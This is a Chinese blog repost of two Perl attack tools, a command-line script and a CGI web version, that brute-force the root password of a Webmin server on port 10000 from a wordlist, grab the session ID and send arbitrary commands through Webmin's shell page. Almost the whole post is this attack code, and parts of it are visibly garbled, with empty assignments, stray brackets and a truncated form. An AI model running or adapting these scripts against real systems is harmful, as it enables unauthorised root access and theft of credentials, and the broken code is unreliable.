Chinaunix首页 | 论坛 | 博客
  • 博客访问: 898623
  • 博文数量: 206
  • 博客积分: 10276
  • 博客等级: 上将
  • 技术积分: 2358
  • 用 户 组: 普通用户
  • 注册时间: 2006-04-01 02:41
文章分类

全部博文(206)

文章存档

2014年(1)

2013年(1)

2012年(2)

2011年(10)

2010年(14)

2009年(15)

2008年(33)

2007年(90)

2006年(40)

我的朋友

分类: LINUX

2007-01-08 17:42:28

编者:Webmin是一个广泛使用的,运行在linux/unix下,用浏览器来管理系统的工具。用它,你不必知道复杂的命令行,也不用了解各种复杂的配置文件,系统管理变得非常简单!可以设置帐号,配置DNS和文件共享等.

Webmin BruteForce + Command execution v1.5

#!/usr/bin/perl
#add script:
#1.wordlist func.
#2.log           (line:41)
################################################################################
# usage:
# ./webmin1.pl
#./webmin1.pl 192.168.0.5 "uptime" wordlist.txt
# [+] BruteForcing...
# [+] trying to enter with: admim
# [+] trying to enter with: admin
# [+] Found SID : f3231ff32849fa0c8c98487ba8c09dbb
# [+] Password : admin
# [+] Connecting to host once again
# [+] Connected.. Sending Buffer
# [+] Buffer sent...running command uptime
# root logged into Webmin 1.170 on linux (SuSE Linux 9.1)
# 10:55pm up 23 days 9:03, 1 user, load average: 0.20, 0.05, 0.01
################################################################################
use IO::Socket;
if (@ARGV<3){
  print "Webmin BruteForcer v1.5\n";
  print "usage:\n";
  print "   webmin15.pl \n";
  print "example:\n";
  print "   webmin15.pl \"id\" wordlist.txt\n";
  exit;
}
my $host=$ARGV[0];
my $cmd=$ARGV[1];
my $wlist=$ARGV[2];
open (data, "$wlist");
@wordlist=;
close data;
;
open(results , ">$host.log");
print results "#############################\n";
print results "Webmin BruteForce + Command execution v1.5\n";
print results "Host:$host\n";
print results "#############################\n";
my $chk=0;
my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",
PeerPort => "10000",Timeout  => 10);
if(!$sock){
  print "[-] Webmin on this host does not exist\n";
  print results "[-] Webmin on this host does not exist\n";
  exit;
}else{
  $sock->close;
  print "[+] BruteForcing...\n";
}
my $sid;
$n=0;
while ($chk!=1) {
  $n++;
  if($n>$passx){
    exit;
  }
  ];
  my $pass_line="page=%2F&user=root&pass=$pass";
  my $buffer="POST /session_login.cgi HTTP/1.0\n".
             "Host: $host:10000\n".
             "Keep-Alive: 300\n".
             "Connection: keep-alive\n".
             "Referer: ".
             "Cookie: testing=1\n".
             "Content-Type: application/x-www-form-urlencoded\n".
             "Content-Length: __\n".
             "\n".
  $pass_line."\n\n";
  my $line_size=length($pass_line);
  $buffer=~s/__/$line_size/g;
  my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",
PeerPort => "10000",Timeout  => 10);
  if ($sock){
     print "[+] trying to enter with: $pass\n";
     print $sock $buffer;
     while ($answer=<$sock>){
        if ($answer=~/sid=(.*);/g){
           $chk=1;
           $sid=$1;
           print "[+] Found SID : $sid\n";
           print "[+] Password : $pass\n";
           print results "[+]:Password:$pass\nSid:$sid\n";
        }
     }
  }
  $sock->close;
  print results "[-]$pass\n";
}
print "[+] Connecting to host once again\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort
=> "10000",Timeout  => 10);
if(!$sock){
  print "[-] Cant Connect once again for command execution\n";
  print results "[-] Cant Connect once again for command execution\n";
}
print "[+] Connected.. Sending Buffer\n";
my $temp="-----------------------------19777347561180971495777867604\n".
        "Content-Disposition: form-data; name=\"cmd\"\n".
        "\n".
        "$cmd\n".
        "-----------------------------19777347561180971495777867604\n".
        "Content-Disposition: form-data; name=\"pwd\"\n".
        "\n".
        "/root\n".
        "-----------------------------19777347561180971495777867604\n".
        "Content-Disposition: form-data; name=\"history\"\n".
        "\n".
        "\n".
        "-----------------------------19777347561180971495777867604\n".
        "Content-Disposition: form-data; name=\"previous\"\n".
        "\n".
        "$cmd\n".
        "-----------------------------19777347561180971495777867604\n".
        "Content-Disposition: form-data; name=\"pcmd\"\n".
        "\n".
        "$cmd\n".
        "-----------------------------19777347561180971495777867604--\n\n";
my $buffer_size=length($temp);
$buffer="POST /shell/index.cgi HTTP/1.1\n".
       "Host: $host:10000\n".
       "Keep-Alive: 300\n".
       "Connection: keep-alive\n".
       "Referer: ".
       "Cookie: sid=$sid\; testing=1; x\n".
       "Content-Type: multipart/form-data;
boundary=---------------------------19777347561180971495777867604\n".
       "Content-Length: siz\n".
       "\n".
$temp;
$buffer=~s/siz/$buffer_size/g;
print $sock $buffer;
if ($sock){
  print "[+] Buffer sent...running command $cmd\n";
  print $sock $buffer;
  while ($answer=<$sock>){
     if ($answer=~/defaultStatus="(.*)";/g) { print $1."\n";}
     if ($answer=~/

>/g){
        $cmd_chk=1;
     }
     if ($cmd_chk==1) {
        if ($answer=~/<\/pre><\/td><\/tr>/g){
           exit;
        } else {
           print $answer;
           print results "[+]$answer\n";
        }
     }
  }
}
Webmin Web Brute Force v1.5 (cgi-version)

#!/usr/bin/perl

use CGI qw(:standard);
use IO::Socket;
$CGI::HEADERS_ONCE = 1;
$CGI = new CGI;

$atak = $CGI->param("atak");
$host = $CGI->param("host");
$wlist = $CGI->param("wlist");
$cmd = $CGI->param("cmd");

print $CGI->header(-type=>'text/html',-charset=>'windows-1254');
print qq~charset=ISO-8859-9>Webmin Web Brute Force v1.5 - cgi<BR>versiyon
Webmin Web Brute Force v1.5 - cgi versiyon


Webmin BruteForce + Command execution- cgi version

v1.0:By Di42lo  - >
~;
if($atak eq "webmin") {
  open (data, "$wlist");
  @wordlist=;
  close data;
  ;
  $chk=0;
  $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",
PeerPort => "10000",Timeout  => 25) || die "[-] Webmin on this host does not
exist\r\n";
  $sock->close;
  print "[+] BruteForcing...
";
  $sid;
  $n=0;
  while ($chk!=1) {
     $n++;
     if($n>$passx){
       exit;
     }
     ];
     $pass_line="page=%2F&user=root&pass=$pass";
     $buffer="POST /session_login.cgi HTTP/1.0\n".
     "Host: $host:10000\n".
     "Keep-Alive: 300\n".
     "Connection: keep-alive\n".
     "Referer: ".
     "Cookie: testing=1\n".
     "Content-Type: application/x-www-form-urlencoded\n".
     "Content-Length: __\n".
     "\n".
     $pass_line."\n\n";
     $line_size=length($pass_line);
     $buffer=~s/__/$line_size/g;
     $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",
PeerPort => "10000",Timeout  => 25);
     if ($sock){
        print "[+] Denenen sifre: $pass
";
        print $sock $buffer;
        while ($answer=<$sock>){
              if ($answer=~/sid=(.*);/g){
                 $chk=1;
                 $sid=$1;
                 print "[+] Found SID : $sid
";
                 print "[+] Sifre : $pass
";
              }
        }
     }
     $sock->close;
}
print "[+] Connecting to host once again
";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort
=> "10000",Timeout  => 10) || die "[-] Cant Connect once again for command
execution\n";
print "[+] Connected.. Sending Buffer
";
$temp="-----------------------------19777347561180971495777867604\n".
        "Content-Disposition: form-data; name=\"cmd\"\n".
        "\n".
        "$cmd\n".
        "-----------------------------19777347561180971495777867604\n".
        "Content-Disposition: form-data; name=\"pwd\"\n".
        "\n".
        "/root\n".
        "-----------------------------19777347561180971495777867604\n".
        "Content-Disposition: form-data; name=\"history\"\n".
        "\n".
        "\n".
        "-----------------------------19777347561180971495777867604\n".
        "Content-Disposition: form-data; name=\"previous\"\n".
        "\n".
        "$cmd\n".
        "-----------------------------19777347561180971495777867604\n".
        "Content-Disposition: form-data; name=\"pcmd\"\n".
        "\n".
        "$cmd\n".
        "-----------------------------19777347561180971495777867604--\n\n";
$buffer_size=length($temp);
$buffer="POST /shell/index.cgi HTTP/1.1\n".
       "Host: $host:10000\n".
       "Keep-Alive: 300\n".
       "Connection: keep-alive\n".
       "Referer: ".
       "Cookie: sid=$sid\; testing=1; x\n".
       "Content-Type: multipart/form-data;
boundary=---------------------------19777347561180971495777867604\n".
       "Content-Length: siz\n".
       "\n".
$temp;
$buffer=~s/siz/$buffer_size/g;
print $sock $buffer;

if ($sock){
  print "[+] Buffer sent...running command $cmd
";
  print $sock $buffer;
  while ($answer=<$sock>){
        if ($answer=~/defaultStatus="(.*)";/g) { print $1."
";}
        if ($answer=~/

>/g){
           $cmd_chk=1;
        }
        if ($cmd_chk==1) {
           if ($answer=~/<\/pre><\/td><\/tr>/g){
              exit;
           } else {
              print $answer;
           }
        }
  }
}
}

if($atak eq ""){
print qq~

type=hidden name=atak value=webmin>

Webmin Web Brute Force v1.5 - cgi
version
Server:value="
阅读(1403) | 评论(0) | 转发(0) |
0

上一篇:主机报警分析

下一篇:SQL语句大全

给主人留下些什么吧!~~